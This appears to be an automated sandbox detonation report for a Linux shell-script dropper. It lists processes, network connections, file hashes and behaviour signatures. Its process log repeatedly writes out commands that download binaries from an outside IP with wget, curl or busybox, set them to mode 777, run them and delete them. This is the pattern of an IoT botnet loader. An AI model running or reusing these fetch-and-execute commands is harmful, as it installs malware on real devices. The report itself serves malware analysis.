[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/chmod

[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz

[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/rm

[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/wget

[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/chmod

[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE

[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/rm

[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/wget

[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/chmod

[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx

[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/rm

[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/wget

[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/chmod

[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4

[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/rm

[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/wget

[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/chmod

[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC

[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/rm

[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/chmod

[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ

[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/rm

[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/chmod

[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q

[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/rm

[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/wget

[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/chmod

[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0

[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/rm

[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/wget

[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/chmod

[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0

[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/rm

[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/wget

[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/chmod

[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC

[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/rm

[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/chmod

[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ

[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/rm

[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/chmod

[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q

[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/rm

[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/wget

[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/chmod

[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0

[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/rm

[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/wget

[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/chmod

[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0

[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/rm

[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/wget

[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/chmod

[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/rm

[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/wget

[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/chmod

[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J

[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/rm

[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/wget

[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/chmod

[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O

[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/rm

[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/wget

[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/chmod

[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB

[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/rm

[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/wget

[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/chmod

[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4

[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/rm

[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/wget

[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/chmod

[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O

[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/rm

[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/wget

[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/chmod

[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz

[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/rm

[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/wget

[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/chmod

[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE

[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/rm

[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/wget

[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/chmod

[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx

[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/rm

[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-14 02:42

Reported

2024-11-14 02:44

Platform

debian9-mipsel-20240611-en

Max time kernel

96s

Max time network

99s

Command Line

[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m N/A
N/A /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J N/A
N/A /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O N/A
N/A /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB N/A
N/A /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O N/A
N/A /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz N/A
N/A /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE N/A
N/A /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx N/A
N/A /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 N/A
N/A /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC N/A
N/A /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ N/A
N/A /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q N/A
N/A /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 N/A
N/A /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 N/A
N/A /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC N/A
N/A /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ N/A
N/A /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q N/A
N/A /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 N/A
N/A /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 N/A
N/A /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m N/A
N/A /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J N/A
N/A /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O N/A
N/A /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB N/A
N/A /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 N/A
N/A /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O N/A
N/A /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz N/A
N/A /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE N/A
N/A /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /usr/bin/curl N/A
File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /usr/bin/curl N/A
File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /usr/bin/curl N/A
File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /usr/bin/curl N/A
File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /usr/bin/curl N/A
File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /usr/bin/curl N/A
File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /usr/bin/curl N/A
File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /usr/bin/curl N/A
File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /usr/bin/curl N/A
